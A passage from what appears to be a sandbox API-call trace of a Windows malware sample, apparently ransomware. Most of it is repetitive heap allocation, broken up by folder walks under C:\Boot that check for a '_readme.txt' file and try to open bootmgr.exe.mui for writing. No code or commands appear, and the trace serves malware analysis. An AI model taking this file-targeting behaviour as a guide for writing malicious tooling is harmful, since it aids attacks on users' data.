Size=0x20) returned 0x328ebf8 [0058.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.232] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.232] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0058.232] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.232] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.232] PathFindFileNameW (pszPath="") returned="" [0058.232] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.233] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.233] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.233] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.233] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0058.233] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0058.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.233] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.233] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.234] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.234] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned=".mui" [0058.234] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.234] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebde0d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.234] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned=".txt" [0058.234] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebde0d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.234] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.234] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.234] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.234] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0058.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.234] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.234] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.234] PathFindFileNameW (pszPath="") returned="" [0058.234] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.234] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.235] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3268798 [0058.235] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0058.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.235] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.235] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0058.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.235] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0058.235] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.235] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.235] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.236] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned=".mui" [0058.236] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.236] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec04230, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216638 [0058.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.236] PathFindExtensionW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned=".txt" [0058.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216638 | out: hHeap=0x660000) returned 1 [0058.236] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec04230, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.236] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.236] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.236] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.238] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.239] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0058.240] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.240] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0058.240] 